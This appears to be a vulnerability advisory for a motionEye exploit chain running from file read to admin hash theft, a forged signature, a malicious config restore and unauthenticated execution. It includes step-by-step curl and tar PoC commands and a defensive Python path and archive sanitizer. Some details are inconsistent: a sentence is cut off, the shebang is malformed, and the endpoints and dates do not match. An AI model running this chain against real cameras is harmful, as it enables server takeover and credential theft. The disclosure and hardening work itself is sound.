How the Mentioned CVEs Work
The motionEye platform (up to version 0.43.1b4) is vulnerable to a critical multi-stage exploit chain that can lead to unauthenticated Remote Code Execution (RCE). This chain leverages a combination of four distinct vulnerabilities that, when linked together, allow an attacker to completely compromise the server.
The chain begins with a Local File Inclusion (LFI) vulnerability, identified as CVE-2026-31978. The `get_media_preview()` function in `mediafiles.py` fails to sanitize `..` sequences in the filename parameter. An attacker can exploit this by sending a request to `/picture/{id}/preview/..%2F..%2Fetc%2Fpasswd` to read arbitrary files from the server. The `%2F` encoding is crucial, as the Tornado web server does not normalize these characters before passing them to `os.path.join()`. This LFI is used to read the configuration file (`/etc/motioneye/motion.conf`), which contains the SHA1 hash of the admin password.
With the admin password hash in hand, the attacker moves to the second stage: a pass-the-hash authentication bypass. motionEye’s signature-based authentication, as implemented in `get_current_user()` in base.py, accepts signatures computed using the password hash as the key. The attacker can compute a valid HMAC-style signature for any request using the stolen hash, thereby gaining administrative access to the API without needing the plaintext password.
The third stage involves an unsafe configuration restore function. The `restore()` function in `config.py` extracts a user-supplied tarball into the `CONF_PATH` using `tar zxC` without sanitizing the archive entries. An attacker can craft a malicious tarball containing an executable file (e.g., lock_<id>) that will be written to the CONF_PATH.
Finally, the attacker triggers the execution of the uploaded file. The `post()` method in `action.py` has no authentication decorator and executes scripts found in `CONF_PATH` with subprocess.Popen. By sending a POST request to /action/<id>/lock, the server executes the attacker-controlled `lock_
DailyCVE Form:
Platform: motionEye
Version: <= 0.43.1b4
Vulnerability: LFI, Auth Bypass, Unsafe Restore, Unauth Action
Severity: Critical
Date: 2025-09-26
Prediction: 2026-07-15
What Undercode Say: Analytics
Affected Code & Attack Vectors
- LFI (CVE-2026-31978): `motioneye/motioneye/mediafiles.py` → `get_media_preview()` lacks `..` checks.
- Pass-the-Hash: `motioneye/motioneye/handlers/base.py` → `get_current_user()` accepts hash-based signatures.
- Unsafe Restore: `motioneye/motioneye/config.py` → `restore()` uses unsanitized `tar -zxC`.
- Unauth Action: `motioneye/motioneye/handlers/action.py` → `post()` missing authentication decorator.
Proof of Concept (PoC) Commands
Start the vulnerable container:
docker run -d --name motioneye -p 9999:8765 ghcr.io/motioneye-project/motioneye:edge
Verify the version:
docker logs motioneye | grep "motionEye server"
Output: `motionEye server 0.43.1b4`
Exploit Chain Commands
- LFI: Read the admin password hash from the config file.
curl --path-as-is "http://TARGET:8765/picture/1/download/%2Fetc%2Fmotioneye%2Fmotion.conf"
Extract the `@admin_password` value from the output.
- Pass-the-Hash: Generate a valid signature using the stolen hash.
import hashlib ... (use the compute_signature function from the advisory) ...
- Malicious Tar: Create a tarball with an executable action script.
echo '!/bin/bash\ntouch /tmp/meye_rce_ok' > lock_1
tar -czf payload.tar.gz lock_1
- Trigger RCE: Upload and execute the payload.
Upload the tarball via the restore endpoint with the generated signature:
curl -X POST "http://TARGET:8765/config/restore?_username=admin&_signature=<SIG>" -F "[email protected]"
Trigger the action:
curl -X POST "http://TARGET:8765/action/1/lock"
Verification
docker exec -it motioneye ls -la /tmp | grep meye_rce_ok
Output: `-rw-r--r-- 1 root root 0 … /tmp/meye_rce_ok`
Exploit:
The exploit is a multi-stage process that chains an LFI, an authentication bypass, an unsafe file write, and an unauthenticated action execution to achieve RCE. An attacker can start by reading the admin password hash via the LFI, then use that hash to compute valid authentication signatures. With admin access, they upload a malicious tarball that writes an executable file to the server. Finally, they trigger the unauthenticated action endpoint to execute the file, gaining full control over the motionEye container.
Protection:
- Upgrade: Update motionEye to a patched version (if available) or apply the fixes from the official repository.
- Block Absolute Paths: In `get_media_content()` and `get_media_path()`, reject absolute paths and `..` sequences.
- Fix Authentication: Remove hash-based signature acceptance; only accept signatures computed with the plaintext password.
- Harden Restore: Sanitize tarball entries to reject absolute paths, `..`, symlinks, and non-regular files.
- Require Auth: Add an authentication decorator (admin-only) to the `ActionHandler`.
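The two path-handling items in this list, rejecting absolute paths and `..` in media lookups and sanitizing restore archives, as one added Python example. This is not motionEye's code: `safe_media_path`, `check_tar_member`, `safe_restore`, `build_tar` and the media root `/srv/motioneye/media` are names and values chosen here, and the sample archives are constructed in the block. It also strips execute bits from every restored file, a step beyond the list above that removes the hand-off to the action handler even if a restore slips through.

```python
"""Added example (not motionEye's own code): media-path validation and
tarball sanitization for a configuration restore. Function names and the
media root are hypothetical; the archives below are constructed samples."""
import io
import os
import tarfile
import tempfile
import urllib.parse
from typing import Optional


def safe_media_path(base_dir: str, requested: str) -> str:
    """Resolve a user-supplied media filename strictly under base_dir.

    The checks run after URL-decoding, so '..%2F' is treated like '../'.
    Absolute paths and any '..' component are rejected outright, then the
    realpath is confirmed to stay inside base_dir (this also catches a
    symlink inside the media directory that points somewhere else)."""
    decoded = urllib.parse.unquote(requested)
    if os.path.isabs(decoded) or decoded.startswith(("/", "\\")):
        raise ValueError("absolute path rejected")
    if ".." in decoded.replace("\\", "/").split("/"):
        raise ValueError("'..' component rejected")
    base_real = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base_real, decoded))
    if os.path.commonpath([base_real, full]) != base_real:
        raise ValueError("resolved path escapes base directory")
    return full


def check_tar_member(member: tarfile.TarInfo) -> Optional[str]:
    """Return a rejection reason, or None if the member is a regular file
    with a relative, traversal-free name (no symlinks, hardlinks, devices)."""
    name = member.name.replace("\\", "/")
    if name.startswith("/"):
        return f"absolute name: {member.name}"
    if ".." in name.split("/"):
        return f"traversal in name: {member.name}"
    if member.issym() or member.islnk():
        return f"link rejected: {member.name} -> {member.linkname}"
    if not member.isfile():
        return f"non-regular file rejected: {member.name}"
    return None


def safe_restore(tar_bytes: bytes, dest_dir: str) -> list:
    """Validate every member before writing anything, then write each file
    with execute bits removed. Returns the relative paths written."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        members = tar.getmembers()
        problems = [r for r in map(check_tar_member, members) if r]
        if problems:
            raise ValueError("restore rejected: " + "; ".join(problems))
        dest_real = os.path.realpath(dest_dir)
        written = []
        for member in members:
            out_path = os.path.realpath(os.path.join(dest_real, member.name))
            if os.path.commonpath([dest_real, out_path]) != dest_real:
                raise ValueError(f"member escapes destination: {member.name}")
            os.makedirs(os.path.dirname(out_path), exist_ok=True)
            with open(out_path, "wb") as fh:
                fh.write(tar.extractfile(member).read())
            os.chmod(out_path, 0o644)  # a restored config file is never executable
            written.append(member.name)
        return written


def build_tar(entries) -> bytes:
    """Constructed sample archive: entries are (name, payload, type, mode);
    for a symlink the payload is the link target."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, payload, ttype, mode in entries:
            info = tarfile.TarInfo(name)
            info.type, info.mode = ttype, mode
            if ttype == tarfile.SYMTYPE:
                info.linkname = payload
                tar.addfile(info)
            else:
                data = payload.encode()
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _rejected(func, *args) -> bool:
    try:
        func(*args)
        return False
    except ValueError:
        return True


def demo() -> dict:
    """Exercise the checks on constructed inputs; every value should be True."""
    media_base = "/srv/motioneye/media"  # hypothetical media root
    results = {
        "clean_path_ok": safe_media_path(media_base, "cam1/preview.jpg")
        == os.path.realpath(os.path.join(media_base, "cam1/preview.jpg")),
        "encoded_traversal_rejected": _rejected(safe_media_path, media_base, "..%2F..%2Fetc%2Fpasswd"),
        "encoded_absolute_rejected": _rejected(safe_media_path, media_base, "%2Fetc%2Fmotioneye%2Fmotion.conf"),
    }
    good = build_tar([("motion.conf", "# constructed config\n", tarfile.REGTYPE, 0o644)])
    exec_file = build_tar([("lock_1", "# constructed script\n", tarfile.REGTYPE, 0o755)])
    traversal = build_tar([("../outside.conf", "x", tarfile.REGTYPE, 0o644)])
    symlink = build_tar([("motion.conf", "/etc/passwd", tarfile.SYMTYPE, 0o777)])
    with tempfile.TemporaryDirectory() as dest:
        results["good_archive_written"] = safe_restore(good, dest) == ["motion.conf"]
        safe_restore(exec_file, dest)
        results["exec_bits_stripped"] = (os.stat(os.path.join(dest, "lock_1")).st_mode & 0o777) == 0o644
        results["traversal_archive_rejected"] = _rejected(safe_restore, traversal, dest)
        results["symlink_archive_rejected"] = _rejected(safe_restore, symlink, dest)
        results["nothing_leaked"] = sorted(os.listdir(dest)) == ["lock_1", "motion.conf"]
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

The restore validates the whole archive before the first write, so a rejected member cannot leave partial state behind, and the path check is repeated on the resolved output path as a second layer in case the name checks are ever loosened. Python's own `tarfile` extraction filters (3.12+) cover some of this, but an explicit allow-list of regular, relative entries is easier to audit against the four items above.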
Impact:
- Unauthenticated RCE: If the normal user password is unset, the entire chain can be executed without any credentials.
- Authenticated RCE: Even with a normal user password, an attacker with normal credentials can escalate to admin and achieve RCE.
- Arbitrary File Read: The LFI vulnerability allows reading any file on the server filesystem.
- Full Compromise: Successful exploitation leads to full compromise of the motionEye process account, the container, and potentially the host environment.
Sources:
Reported By: github.com